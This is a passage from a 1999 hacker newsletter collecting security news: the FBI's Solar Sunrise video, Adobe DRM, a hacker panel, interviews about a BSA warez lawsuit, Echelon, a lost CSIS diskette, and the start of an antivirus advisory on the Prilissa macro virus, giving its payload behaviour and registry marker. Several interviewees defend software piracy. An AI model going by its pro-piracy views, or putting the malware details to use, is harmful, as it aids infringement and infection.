his merry way unfettered. So unless the A/V industry changes it's position on what makes a piece of code malicious, smart trojan users will fly on by using 'legitimate' products. But why should they scan for those products? After all, they weren't released at a hacker convention :-) RenderMan www.Hackcanada.com RenderMan@Hackcanada.com @HWA 38.0 FBI Releases Anti Cyber Crime Video ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue The FBI has released a new video aimed at the high-tech industry across the country. It is hoped that the tape will encourage companies to report computer break-ins to the federal government. The tape contains scenes showing government officers catching three California teens who had electronically broken into numerous computer networks in the Pentagon. The FBI says that not enough firms are reporting computer crime to the federal government and are instead covering them up. (First they say they are overworked and understaffed, now they want even more work to do. Yeah, makes sense to me. Anyone know how to get a copy of the tape? I need a good laugh.) Yahoo News - Anyone have a better link for this? http://dailynews.yahoo.com/headlines/local/state/colorado/story.html?s=v/rs/19991118/co/index_2.html#3 Late Update 0948111999EST Thanks to devost for sending us a better link. We now know that the title of the video is "Solar Sunrise: Dawn of a New Threat" and should be available at better FBI offices everywhere. Excite News http://news.excite.com:80/news/u/991117/19/tech-infowar Yahoo; F-B-I Makes Hacker Video - (STATEWIDE) -- The F-B-I has made a new video aimed at the high-tech industry in Colorado and across the country. The tape is supposed to encourage companies to report computer break-ins to the federal government. It shows government officers catching three California teens who had hacked their way into at least 11 computer networks in the Pentagon. Right now... the F-B-I says... most firms hire private companies to track down hackers. But the federal government says...reports of computer break-ins are crucial to national security. -=- Excite; Feds put happy face on infowar Updated 7:14 PM ET November 17, 1999 By PAMELA HESS WASHINGTON, Nov. 17 (UPI) As part of an effort to sell industry on its nascent computer crime investigation unit, the FBI has just completed an entertaining, slick video detailing how they caught three teenagers who were behind the famed February 1998 information warfare attack on at least 11 Defense Department networks as the military prepared for a renewed war on Iraq. The Pentagon considers the incident, known as Solar Sunrise, the opening volley in a new age of warfare that exploits personal computers and the Internet to cripple military operations. A similarly notorious attack known as Moonlight Maze is still ongoing and is believed to be coming out of Russia. That case has not yet been solved. The video, "Solar Sunrise: Dawn of a New Threat," recounts how two California teenagers, coached by an Israeli teen hacker known as "Analyzer," routed through scores of networks to gain entry into unclassified Defense Department networks that housed sensitive troop deployment and logistics information. The hackers started on Feb. 3 and were tracked down by Feb. 25. The California boys are on three years of probation. The Analyzer is under indictment in Israel but is currently fulfilling his military service. The video was publicly shown for the first at a cyberterrorism conference in Washington, D.C., on Tuesday. A government official who asked not to be named explained that the video would be distributed to local FBI detachments to help them convince local law enforcement authorities and private companies to alert the FBI when computer break-ins occur. Concern exists in industry especially in the financial sector, where public perceptions can immediately affect the bottom line that bringing the FBI into a case of hacking increases the chances the incident will leak out to the public. In many cases, they have preferred to handle it with private security firms. The FBI considers knowing about the incidents critical to national security. Hackers do not target government agencies alone; they also bounce off private networks. Tracking that activity can provide important indications of coming major attacks, both cyber and physical, they contend. 39.0 Adobe Introduces Potentially Flawed Security System ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by RABID.RAT Adobe has introduced what they call a secure digital delivery system which they hope will prevent the unauthorized distribution of PDF documents. Adobe hope to accomplish this by using the unique serial number located on Zip, Jaz, or Clik disks as a component of their encryption system. (Ok, for those that are unfamiliar with encryption, this whole scheme is based on a secret number, the unique serial number on the disk. This number is "inaccessible to end users" according to Adobe. Of course if the Adobe software can access the number then an end user may be able to figure it out to. Once you have the number it should be pretty trivial for a good cryptographer to figure out the rest. This is really pretty sad. Adobe http://www.adobe.com/epaper/features/iomega/main.html Note: We have not actually looked at the encryption mechanism used by Adobe and have based the above comments only on what little information is available on their web site. Adobe; ADOBE TEAMS WITH IOMEGA TO OFFER A SECURE DIGITAL DELIVERY SYSTEM By Lisa Anderson Do you own any disks containing sensitive or copyrighted content? If so, do you worry that someone could illegally copy and use that information? Adobe and Iomega have teamed up to answer this common concern with a secure digital delivery system that prevents unauthorized distribution of Adobe® Portable Document Format (PDF) files stored on portable media. Adobe is helping publishers, distributors, retailers, and consumers to exchange electronic content securely by tying the use of that content to specific types of portable media and hardware. Iomega, manufacturer of the popular Zip disk, has encoded every portable Zip, Jaz, and Clik disk with a unique serial number. The serial numbers are stored in a part of the disk that is inaccessible to end users, so the numbers cannot be modified. As part of a new cooperative alliance, Adobe is licensing code from Iomega that lets Adobe's Web Buy software extract the serial number from any Iomega disk, and use that number as a component of Adobe's encryption system. That makes Iomega's disks function as secure portable storage devices. The two technologies work together to emulate the way we use physical books today. "Instead of sharing your paperback or your document, you'll be able to share your disk, but only one person at a time will be able to read that 'book,'" says Germaine Ward, vice president of software solutions at Iomega Corporation. @HWA 40.0 The 'Enemy' Speaks at Security Conference ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by bluemiracle The Computer Security Institute as part of its symposium on information security earlier this week hosted a "Meet the Enemy" session. Aleph 1, Mycroft, Maelstrom, and K0resh participated on the panel in front of over 200 administrators from government, the military, hardware and software manufacturers, financial services companies and e-commerce shops. (Enemy, what a derogatory term, thanks.) APB News http://www.apbnews.com/newscenter/internetcrime/1999/11/17/hackers1117_01.html Hackers 'Meet the Enemy' in D.C. Confront Computer Security Pros at Conference Nov. 17, 1999 By James Gordon Meek WASHINGTON (APBnews.com) -- Hackers say they are misunderstood by the public, but they love publicity. They say they are not dangerous, but warn computer users to put tighter computer security measures in place. They say they are not always interested in criminal activity such as theft, destruction or espionage. They hack out of intellectual curiosity and voyeurism. In an unusual give and take staged at a Washington hotel last night, a dozen unrepentant hackers explained why they penetrate computer systems. It's for fun, for notoriety -- and for curiosity so insatiable that they risk federal criminal charges for unauthorized intrusions, they said. 200 experts listen in Staged by the Computer Security Institute as part of its symposium on information security this week, the hackers beamed into the Marriott Hotel's ballroom on an audio conference call to be pitted against an audience of about 200 in what was billed a "Meet the Enemy" session. Those seated in the large hall said they work for the government, the military, hardware and software manufacturers, financial services companies and e-commerce shops. One by one they questioned hackers identified only by their Internet "handles," pitting law enforcers against lawbreakers in a friendly discussion that organizers said was meant to elevate cyber-diplomacy. The hackers appeared confident and cynical, demonstrating a consistent streak of black humor that kept attendees snickering all evening. The computer security experts seemed awed by the young snoops, regarding them almost as celebrities. Defacing a site is afterthought Early on, a questioner asked about the widely reported defacements of public Web sites, where peculiar slogans and images on sites operated by the FBI, Congress and other government institutions appeared to be politically motivated. A hacker who identified himself as Elias Levy said the defacements are often an afterthought to a successful intrusion meant to get publicity. "It gives the media an excuse to make up more words like 'hacktivist,'" scoffed another. Though characterized as "media devils," several said the press is considered indispensable to hackers who want their exploits online to be recognized by the public and the Internet "underground." Aiming for publicity A hacker called Microft answered a query about target selection by saying there are several considerations: "You're going look at several things, such as access, connectivity or publicity -- media content." Defacements are typically signed by an intruder's identifying handle. Most of the participating hackers said they had more than a decade of experience pinging computer networks, and several admitted they had more or less gone straight and now work as security consultants. British hacker Maelstrom said, "People get caught, people decide they don't want to get caught, or people grow up and just change." "A lot of people get busted and go to jail, have their stuff taken and have to start over again," said another named K0resh. "I'm 29, and I don't want to start over again." Tempted to join the dark side But the reformed hackers are tempted regularly to join the dark side, and they still creep around the shadowy underbelly of the Internet. All claimed to have received solicitations -- often in person -- from foreign intelligence, federal agents and corporate operatives seeking competitors' information, such as design prototypes. The hackers said they are regularly offered thousands of dollars to make illegal intrusions. "I get propositioned on a daily basis to hack things," Maelstrom said. When approached, "I get this little 'Spidey Sense' thing that tells me this is trouble," said K0resh. "I don't think too much about it. I just tell them no, and go on my way." Can break into almost anything The basic assumption by the solicitors or undercover agents conducting sting operations is that skilled hackers can gain access to almost anything. And their assumption is correct, according to this bunch. One hacker said no system is "bulletproof," but computer networks can be reasonably fortified with firewalls and other measures. An inquisitor asked: "Is there anything you can't break into?" "Bananas," Microft joked. "And kiwis are very hard to peel." Helping to debunk myths Tuesday's hacking summit was organized by ponytailed security consultant Ray Kaplan, who said the 10th-annual meeting is designed to debunk the mythology about hackers as always engaged in criminal activity. "In my experience, the term 'hacker' is much maligned, abused, misused and otherwise misunderstood," he told APBnews.com. What motivated him to facilitate the Meet the Enemy conference each year is a desire to share knowledge and understanding. The hackers "like to help the so-called legitimate security community to understand the underground," he said. Millennium bug feared Participants on Tuesday repeatedly demanded to know if there was any truth to rumors that problems caused by the millennium bug might result in widespread computer attacks, intrusions or theft. When asked the greatest Y2K-related vulnerability to computers, hacker Maelstrom replied, "The greatest vulnerability is that people are paying too much attention to that [question], and not spending enough money on security." Another tried to reassure the audience that hackers are not likely to raid computers worldwide after the potentially devastating date rollover. "Most hackers will be really drunk on New Year's Eve, so you'll all be pretty safe." James Gordon Meek is an APBnews.com staff writer in Washington (james.meek@apbnews.com). @HWA 41.0 Defense Fund Started for Warez4Cable + interviews. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by |DiSk| The recent crackdown on Newnet by the Business Software Alliance has resulted in several arrests for copyright violations. In response fellow Newnet patrons are organizing a fundraiser to help out the "#warez4cable" members. Anti-BSA.org also has interviews with some of the affected people. Anti-BSA.org http://www.anti-bsa.org/ SOFTWARE WATCHDOG ATTACKS CYBERPIRACY BSA Files Lawsuit Against 25 Individuals for Alleged Piracy in High-Speed IRC Channel; Seizes Computers in California and Michigan Washington, D.C. (11 November 1999) -- The Business Software Alliance (BSA) today announced it has launched a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating software in an IRC channel. In the past week, under the supervision of U.S. Marshals, BSA carried out unannounced inspections of computer equipment at residences in Sacramento and Downey, CA, and in Troy and West Bloomfield, MI, seizing five computers. Under U.S. law, all twenty-five defendants named in the lawsuit are potentially liable for damages up to $100,000 per copyrighted work infringed. "Because of the increased access to high-speed connections, piracy in IRC channels is fast becoming one of the most popular ways to traffic in illegal software on the Internet," said Bob Kruger, vice president of enforcement for BSA. "That is why BSA is taking immediate action against this aggressive form of piracy," continued Kruger. The lawsuit results from months of intensive investigation by BSA's Online Investigative Unit. By using a special subpoena procedure created by the Digital Millennium Copyright Act enacted by Congress in 1998, BSA was able to identify the individuals named in the suit and take legal action against them. The lawsuit adds a new dimension to BSA's Internet anti-piracy campaign that to date has involved the shutting down of thousands of warez web sites and working closely with law enforcement to promote criminal prosecutions. "This lawsuit is part of BSA's on-going campaign to keep the Internet from becoming a safe haven for the conduct of software piracy," said Kruger. "Anyone who thinks that they can hide behind the anonymity of the Internet to commit copyright infringement had better know that the law gives them no quarter," continued Kruger. THIS JUST IN -- Activision rumored to have joined BSA -=- Interviews with key people in the #warezforcable bust: Pandora; First i'd like to say that there are certain questions about the specifics of my "activity" that I cannot answer. We are still in settlement negotiations and I'm really not supposed to be talking about the case. I'll answer what I can. [data] Is it true that you were busted for distributing Pirated Software? It's true that I'm being sued by the BSA for copyright infringement, yes. [data] how did you find out that you were under investigation? Hmm, I didn't until Nov 5th when three U.S. Marshall, two lawyers and two computer forensics pounded on my door at 7:30AM. [data] did they explain how they caught you? We were served with REAMS of legal documents that include a statement from the BSA Investigator explaining how he logged on to several fserves and downloaded software, etc. He states that W4C has been under surveillence since June. [data] do you have the IPs that logged in logged? has any .bsa.org ip ever logged in? I don't, but from the screenshots he enclosed you can see that he was using the nicks cdc4u and dawn. [data] Im surprised pacbell released your presonal info. Well, under some bill that was passed a couple years ago the BSA was able to subpeona our ISPs for our information. A little added information: During their raid on our home 3 computers and 2 CDs were seized. The computer forensics spent FOUR HOURS in our apartment trying to make directory listings of what was on each of the computers. On more than one occassion they needed the assistance of myself or Caine/Abel in doing so. A few days later our lawyer told us that the dir listing they'd made were somehow CORRUPT (read as: they didn't know what they were doing). A week and a half later we do not have our computers back and have yet to hear from them what exactly they want in this settlement. We have agreed to sign an Injunction that orders us not to download, distribute, use and so on, unlicenced software. We possibly won't get our computers back, and it's likely that they will ask for a monetary settlement. Scarily, the law allows them to fine us $100,000 PER piece of software should we be convicted of copyright infringement. At this point in time we've already spent over $1000 on lawyer fees alone. I also want to send out a big THANKS to all who have supported us through this. To all the old friends who have called or contacted us, and to all those out there wishing us the best... we appreciate you more than you know. Thank you. If you have any other questions, please ask. I want it to be clear to all what is really happening since there seems to be a lot of speculation and rumor going around. BY THE WAY!! Some pertinent info you might want to know. For DAYS I couldn't stop asking "Why us?? Why me??" As you're well aware there are bigger channels and groups out there than W4C, it didn't make any sense that the BSA was targetting us. Well, do you remember a guy named SirSlappy? General trouble maker on NewNet?? Apparently he report myself and Caine to the BSA, which started this huge disaster. I hope he's on everyone's blacklist. -=- Etamitlu founder of #warezforcable [data] Hello [Etamitlu] hey, sup? [data] is it true you were a #warez4cable cofounder? [Etamitlu] yes, i was a cofounder along with a few others [data] What did you notice strange in the channel before the incodent? [Etamitlu] well, we never really noticed anything *strange* [Etamitlu] but, Appz350 did come in and say that "Microsoft busted him" a couple weeks before it happened [Etamitlu] we didn't believe him because Microsoft obviously can't arrest him [Etamitlu] but maybe their was some truth to that [data] Maybe [Etamitlu] that's all that i cna think of that was strange before it happened [data] Why do you think what the BSA did was wrong? [Etamitlu] it was wrong in my opinion because catching 25 of us won't do anything.. i mean we're the small guys [Etamitlu] if they really want to put a stop to piracy they need to go after the release groups [Etamitlu] also, we were on newnet [Etamitlu] there are something like 4000 people on newnet [data] Do you know where to go after the release groups? I image it would be hard [Etamitlu] they could have made a MUCH larger impact if they had gone after dalnet with nearly 10 times as many people [Etamitlu] well yeah, it would be fairly hard.. but paradigm was busted once if im not mistaken [data] who closed the channel? When? and Why? [Etamitlu] who closed #warez4cable? [Etamitlu] well [Etamitlu] we were supposed to have an op meeting last Thursday night [Etamitlu] all day that day people were flooding with messages like "THE FBI IS HERE! LEAVE NOW!!!" [Etamitlu] so it was obvious that we were dead because everyone was leaving [Etamitlu] and all of our ops were puzzled, leaving, and asking questions [Etamitlu] so we had a founder/cofounder meeting and decided to shutdown the channel [Etamitlu] we just set it +im and banned everyone [data] Were any founders/cofounders busted? [Etamitlu] no, they were not [Etamitlu] surprisingly, they were not [Etamitlu] however [Etamitlu] Caine and Pand0ra had been high ranking w4c members in the past [Etamitlu] and they were the first caught [data>] Yes and their houses were raided.. the interview is at www.anti-bsa.org/interview2.html [Etamitlu] other than that, no founders'/cofounders were caught [data] Im sure the BSA will be in the chan, is there any message you would like to leave them? [Etamitlu] i'd just like to let them know that they made a big mistake here and that this won't even help to stop a fraction of piracy -=- |{rypto [data] Hello [data] Is it true you are being served for serving warez in #warez4cable? [|{rypto] Yeaps [data] How/when did you find out? [|{rypto] umm, November 12, 1999 [data] and how? [|{rypto] by Fedex [data] How did they say they caught you? [|{rypto] They went into my fserve w4c-krypto and saw what i had and got 4 counts on me [data] I see [data] what did they tell you the punishment will be? [|{rypto] a bunch of shit...promise to never to it again, they want the PC, and money [data] IF they had warned you... would you have stopped? [|{rypto] Hell YEAH [data] how old are you? [|{rypto] 18 [data] As you know, many channels have closed because of these law suits. If the bsa had gone after one of the groups, or only one or two of the servers as opposed to 25, would people have been as worried? [|{rypto] Yeah i think so becasue people would have looked up BSA and seen what they do [data] Were you aware that this could happen when you joined #warez4cable? [|{rypto] I wasn't really aware of the consequences [data] Must have been horrible for you [|{rypto] yeah it is but lucklly i have the smallest case of them all [data] do you have any idea the IPs or the nicks of the 'BSA spies'? [|{rypto] yeah dawn,cdc4u [data] you have their IPs? [data] or, isps [|{rypto] no sorrry [data] okay [data] any last message to any BSA members and the internet surfing public? [|{rypto] Yeah stop were just having fun [data] Thanks a lot [data] good luck on the case [|{rypto] thanx -=- SirSlappy Session Start: Tue Nov 16 22:15:43 1999 * Logging SirSlappy to 'SirSlappy_19991116.log' [sh0rt] can i speak to you, on the record? [SirSlappy] sure [sh0rt] what do you have to say about pand0ra accusing you of blowing the whisle...ratting on w4c to the bsa [sh0rt] ? [SirSlappy] well. [SirSlappy] you ready to quote me on this shit? [sh0rt] yes [SirSlappy] I think it's halarious [SirSlappy] and don't ask any questions for a while [sh0rt] is it true? [SirSlappy] because.. [SirSlappy] I'm going to be typing some shit [sh0rt] okay [sh0rt] type away [SirSlappy] and you can put it on the web page for all the pricks that fuckin /msg me every fuckin day trying to start shit [sh0rt] go ahead [SirSlappy] to the bitches out there that want some of the Slapper... Come get some.. No one can fuck with me or my l33t Vhosts [SirSlappy] now.. to the business [SirSlappy] 1st of all. No!, I did not report anyone to the BSA. I had no desire for anyone on IRC to get in trouble [SirSlappy] yes, I take over channels and hack shit and do lame shit..whatever. but that is on the internet.. That isn't in real life [SirSlappy] I would NEVER report anyone on IRC. Maybe from AOL. (maybe). [SirSlappy] but.. I would NEVER report ANYONE Anyway... [sh0rt] what would you like to say to pand0ra? [SirSlappy] I have no desire to. [SirSlappy] I would like to tell her.. [SirSlappy] um.. [SirSlappy] how the hell did you come up with my name? There is no log of me being in that channel [SirSlappy] I never had anything against W4c [sh0rt] why do you think pand0ra believs you were the one who ratted on w4c? [SirSlappy] well. I take that back. [SirSlappy] I did.. about a fuckin year ago. and that's another story in itself [SirSlappy] I think it's because I took over the #W4c channel [SirSlappy] like.. 8 months ago [SirSlappy] or something [SirSlappy] that's the only reason I can think of that she would say I did it [sh0rt] do you agree with what the bsa is doing? [SirSlappy] well... [SirSlappy] I think that the software companies bring warez upon themselves [SirSlappy] I am for warez.. at least until the software companies make software a better deal [SirSlappy] like. [SirSlappy] if you want to buy software.. It's like 50 bucks for a shitty program [SirSlappy] and once you buy it.. there's no taking it back [SirSlappy] that sucks a dick [SirSlappy] you can't resell it [SirSlappy] you can't do shit with it.. it's yours..forever. [sh0rt] do you serve warez? have you ever served warez? [SirSlappy] I plead the 5th on that question [sh0rt] understandable. [sh0rt] thanks for your time. [SirSlappy] I'm here to help [SirSlappy] :) [sh0rt] any final words? [SirSlappy] yes. [sh0rt] shoot [SirSlappy] to all of you lamers who feel you need to /msg me on IRC telling me that I'm a snitch.. etc etc.. why don't you save that shit. I'm sick of hearing it [SirSlappy] not done [SirSlappy] do you really think the BSA is gonna come crashing in someone's door because 1 person called them up? [SirSlappy] do you think they just said.. "shit!! there's warez on IRC .. SirSlappy said so!! let's go get em!" [SirSlappy] I doubt it [SirSlappy] that's all [SirSlappy] thanks for the interview [sh0rt] alright. [SirSlappy] :) [sh0rt] peace [SirSlappy] yep Session Close: Tue Nov 16 22:28:24 1999 @HWA 42.0 Menwith Hill To Get Upgrade Monies ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by seventh The fiscal 2000 Intelligence Authorization Act contains language that would indicate that an undisclosed amount of funds have been earmarked for upgrades to the Menwith Hill signals intelligence listening post in England. Menwith Hill is widely suspected of being one of the central European-based listening posts for the Echelon system, an global surveillance network sponsored by the NSA. Federal Compuster Week http://www.fcw.com/pubs/fcw/1999/1115/web-echelon-11-18-99.html NOVEMBER 18, 1999 . . . 11:59 EST Intelligence bill targets NSA, Echelon upgrades BY DANIEL VERTON (dan_verton@fcw.com) A bill that would authorize appropriations for the fiscal 2000 operations of the U.S. intelligence community includes funding for infrastructure upgrades at a key facility in what many suspect is a global, electronic surveillance network. According to language in a joint report on the fiscal 2000 Intelligence Authorization Act, an undisclosed amount of funds have been earmarked for upgrades to the Menwith Hill signals intelligence listening post in England. The top-secret facility is widely suspected of being one of the central European-based processing centers for the "Echelon" system, an electronic surveillance network sponsored by the National Security Agency. The Cold War-vintage global spy system consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. Known as Echelon, the system came under attack last year after the Scientific and Technological Options Committee of the European Parliament pledged a full-scale investigation into suspected NSA privacy abuses ["European Union may investigate U.S. global spy computer network", fcw.com, Nov. 17, 1998]. Commenting on the floor of the House, Rep. Porter Goss (R-Fla.) praised the House/Senate conference report, which was agreed to Nov. 9, for its insistence that NSA be made to account for its methods of intercepting electronic communications. "We direct...the NSA to report in detail on the legal standards that it employs for the interception of communications," Goss said. Rep. Sanford Bishop Jr. (D-Ga.) said that although NSA is facing "tremendous challenges coping with the explosive development of commercial communications and computer technology...[the agency] has not demonstrated much prowess in coping with the challenge." According to Bishop, a "sustained funding increase" may be necessary to fix NSA's dwindling eavesdropping capabilities. "Action is...imperative since the nation cannot navigate with an impaired sense of hearing," he said. @HWA 43.0 CSIS Lost Classified Floppy Disk ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I love this, it sure inspires confidence in our esteemed CSIS operatives talk about a bunch of fuckups! - Ed From HNN http://www.hackernews.com/ contributed by William Knowles The Canadian Security Intelligence Service lost a floppy disk containing classified information. The disk was found in a phone booth in 1996 in downtown Toronto. Recently it has been learned that the disk contained information in plain text about confidential informants and contacts, information about covert operations and details about training exercises. (Remember your only as secure as your weakest link, or your stupidest employee.) Globe and Mail http://www.globeandmail.com/gam/National/19991118/USPYSN.html The spy secrets in the phone booth Shedding light on another CSIS slip-up, man describes stumbling over 'sensitive' material ANDREW MITROVICA and JEFF SALLOT The Globe and Mail Thursday, November 18, 1999 Toronto and Ottawa -- ANDREW MITROVICA in Toronto JEFF SALLOT in Ottawa A Toronto man who found a Canadian Security Intelligence Service computer diskette in a telephone booth says it detailed -- in plain English -- the names of confidential informants and contacts, information about the service's targets and covert operations in Canada and details about espionage training exercises. "The more I looked, the more I realized that this was very, very, sensitive stuff," the man told The Globe and Mail yesterday in his first interview about the diskette mishap, which took place in 1996. "This is amazing, I thought." Federal government sources confirmed many details of the man's account. The sources said the diskette was lost by a CSIS intelligence officer who was moving from headquarters in Ottawa to a new position in Toronto. Although its loss was reported in the media at the time, the man's comments provide the first details of the information the diskette contained. The new revelations are likely to become the latest embarrassment for Canada's embattled spy agency, which has already been rocked by news that top-secret documents were in a briefcase stolen from an agent's minivan in Toronto last month. The man who found the diskette in 1996 admitted he considered selling it to the "highest bidder" before returning it to the agency. "People were named; contacts that they [CSIS] had within organizations in Bosnia and in Canada, people that were in training, covert operations," he said. "They were talking about largely unofficial, undercover contacts and people that they were observing," he said. He eventually returned the diskette to CSIS because he thought it was his duty, he said. But the episode "shattered my illusions about what a secret service operates like. I was doing what I felt was the responsible thing to do." The incident was later investigated by the Security Intelligence Review Committee, an independent watchdog panel. The committee was satisfied that the classified material hadn't fallen into the hands of anyone who could have used it to harm national security. Nevertheless, the case caused changes in CSIS's internal procedures for transferring sensitive data from one location to another, the federal sources said. The finder of the diskette, who asked not to be identified for fear of reprisal, recounted his brief foray into the shadowy world of espionage. It began in early August, 1996, when he stopped to make a phone call at the busy Toronto intersection of Yonge Street and Lawrence Avenue. "I went into one of the phone booths to make a call and there was a diskette on the shelf. It was just the diskette; there was nothing else. It had obviously fallen out of something because there were quite substantial scratch marks on it," he recalled. He looked around for the owner. The library near the phone booth was closed, so he posted a note on the doors, saying: "Disk found, please call . . ." He went home and waited for a reply. Curious, he shoved the unmarked diskette into his computer. "I thought, 'Maybe there is something in here that identifies who this belongs to,' " the man said. He opened the document using his computer's word-processing software and was shocked by what popped up on his screen. "It came up without any conversion. It just opened right up; it wasn't password protected and [as] I started scanning through this stuff there was a large quantity of clearly sensitive information. Quite frankly, I thought at first it was just an elaborate practical joke. It was a whole bunch of cloak-and-dagger stuff." He kept reading the uncoded documents. There were between eight and 12 in total, each about four pages in length. He only read three or four documents, he said. He said he considered selling the diskette to one of CSIS's targets, who was identified in the documents. "I briefly toyed with the possibility of seeing who would buy this for the highest bid. I do know there were names there, and I thought, 'Hey, what if I give this person a call and say: Do you know what CSIS has on you?' I abandoned the idea. I figured I could get myself in a lot of trouble that way." He tried to make a copy of the diskette but realized that the information had not been transferred. In mid-August, he picked up the phone and called CSIS in Toronto. "I didn't know who CSIS was. So I just looked them up in the phone book and I called them up." He described his find to a CSIS officer. A few hours later, H. N. (Harry) Southern, the agency's head of internal security, arrived at the man's home office in downtown Toronto. The following day, CSIS called back and said they wanted to pay him another visit. This time, two agents dropped by: Angela Jones and Mr. Southern. They began to question him about "everything I knew about this," he said. CSIS knew that he had told friends about his diskette adventure. "They asked me: 'Did you make any copies of it?' and I said that I didn't make any printouts but I had made a copy of the diskette, but when I tried to open it, I couldn't read it. They took my word on it and never asked me for the copy," the man recalled. The agents asked him not to tell anyone about the lost diskette. "They were extremely uncomfortable. They were very ill at ease, very embarrassed. It's an organization that's supposed to be top secret. And I think it was uncomfortable for them to go to a Joe on the street like me and ask him how he managed to just find in a phone booth these kind of documents," he said. The pair of agents paid him a third visit after they learned that he knew a journalist who worked in Toronto for The Christian Science Monitor newspaper. The same agents later paid a visit to the journalist and his wife and peppered them with questions about what they knew about what was on the diskette. He said the agents told him they were getting a lot of heat from their spymasters, who were anxious that his find not hit the front pages of newspapers in Canada. The man, who works as an administrator in Toronto, asked the CSIS agents for money in return for his silence. They refused. He had some harsh words for the agency. "I told them if things are as unprofessional as they seem, maybe it would good if a little heat was put under some people. They said: 'Believe me, there is some heat being put under some people,' " he said. He was not threatened. "They were very meek," he said. Former CSIS officer Peter Marwitz said the case of the missing diskette is known widely within the service and is a sore point for many veteran officers who think carelessness on this scale should have been a firing offence. The veterans, Mr. Marwitz said recently, believe the careless officer in the 1996 incident went unpunished because "she brazenly defied her challenger, reminding the service that she was a woman and a minority." The SIRC, the watchdog committee that reports to Parliament, made an oblique reference to the 1996 incident in one of its published audits. Procedures were changed after the incident so that an officer moving from headquarters to a regional office isn't required to carry data physically on computer diskettes, federal sources said. Officers can now transfer their computer network data accounts to the new location and sign on to the network and get access to any of the files they are authorized to see, the sources said. CSIS spokesman Dan Lambert said the service will neither confirm nor deny details of the lost-diskette episode. He said an internal investigation is still under way in the case of the employee who lost the operational planning document while at the hockey game. Meanwhile, Solicitor-General Lawrence MacAulay, the federal minister responsible for both CSIS and the RCMP, confirmed that the Mounties lost a briefcase containing sensitive documents in British Columbia in 1995. But he said RCMP Commissioner Philip Murray assured him that the loss did not pose a threat to national security. Opposition parties blasted Mr. MacAulay for the third day running yesterday for his failure to immediately notify the SIRC, the review committee, upon learning of the incident at the hockey game. "People . . . need to know that these departments are not leaking like sieves," Reform MP Jim Abbott said. @HWA 44.0 Hitachi Chip May Prevent Use of Third-party Printer Cartridges ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench New technology being developed by Hitachi may prevent people from using third party printer cartridges. By embedding chips similar to those in hotel keys or smart cards into toner or ink cartridges Hitachi could prevent customers from using third-party cartridges. Hitachi is planning on incorporating this technology into laser printers and copiers it markets in Japan and is currently in negotiations with several US companies to license the technology. PC World http://www.pcworld.com/pcwtoday/article/0,1510,13897,00.html Smart Cards May Secure Peripherals Hitachi previews chips that could ID pirated music or third-party printer cartridges. by Martyn Williams, IDG News Service November 18, 1999, 1:30 p.m. PT LAS VEGAS -- Hitachi Maxell is previewing at Comdex here a prototype chip being eyed by laser printer and copier makers as a way to stop customers from using third-party toner cartridges. The new chip is a development of proximity smart cards already on the market. Smart cards are widely used in applications like hotel door keys and telephone cards, and can exchange data when brought within a few millimeters of a reader. At just 2.3 mm square, the chips greatly cut down on the space needed for the devices that use them. The chip supports a 32-bit key and may also find its way into an antipiracy device to protect CD- or DVD-based media. If a disk lacked the chip, the player would refuse to accept it. Hitachi already plans to build card readers into the laser printers and copiers it markets in Japan. With the chips embedded into toner cartridges, printers can reject cartridges that don't carry the chip. This could kill the third-party toner business in Japan, but it's not clear whether U.S. law would permit the same tactic, says Masaaki Chino, manager of Hitachi Maxell's smart card projects. "If they include this reader board into the copy machine and this chip into the cartridge, they can control which cartridges are used," Chino says. Nevertheless, Hitachi is already talking to several major U.S. vendors regarding the technology, although Chino declined to name them. Hitachi supplies laser printer and copier engines to NEC, Brother, and Minolta. At Comdex, Hitachi is also showing an application in which the chips are loaded with a URL and embedded into vendors' promotional material. When the brochures are near a dedicated reader for personal computers, the company's Web site appears inside the browser running on the PC. The current implementation, which requires a stand-alone reader, is a little clunky, Chino acknowledges. But Hitachi is talking with several PC vendors, including Sharp, about building the readers into computers. @HWA 45.0 NEW MACRO VIRUS OUT THERE ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Saturday 20th November 1999 on 2:13 pm CET Anti-virus researchers at Network Associates Inc. said Friday that 10 Fortune 500 companies on three continents have been hit with a new virus called W97/Prilissa. Prilissa is a nasty variant on two better known attacks -- the Melissa worm and the PRI virus. The virus depends on the Windows 95 and 98 operating systems and the Word 97 word processing application. Link: NAI http://vil.nai.com/vil/vm10441.asp Virus Name W97M/Prilissa Date Added 11/17/99 Virus Characteristics This is a virus for Word 97 documents. It is able to replicate under the SR-1 release of Word 97. It will turn off the macro warning feature of Word 97. This virus uses the "ThisDocument" stream, or class module, of a document or template during infection routine. It is a copy-cat of the W97M/Melissa.a virus and there is a payload to send the infected file via MS Outlook. Another payload exists for this virus which is date activated - December 25th - to reformat the hard drive (on Windows 9x systems) and also overlay the active document with random shapes. Due to this overlay activation which is a copied technique of the W97M/Pri virus, the name is a combination of W97M/Melissa and W97M/Pri, hence W97M/Prilissa. This virus hooks the system event of opening documents in Word97 by the subroutine "Document_Open" thereby running its code. Another system event hooked is the closing of documents due to the subroutine "Document_Close" in the global template after infection. This virus checks for the existence of a registry key, a self-check to verify if the local system has already been infected. The key is: "HKEY_CURRENT_USER\Software\Microsoft\Office\" "CyberNET"="(C)1999 - Indonesia by AnomOke!" If this key is not found, the virus code uses VBA instructions to create a MS Outlook email message with the subject line "Message From " (Office97 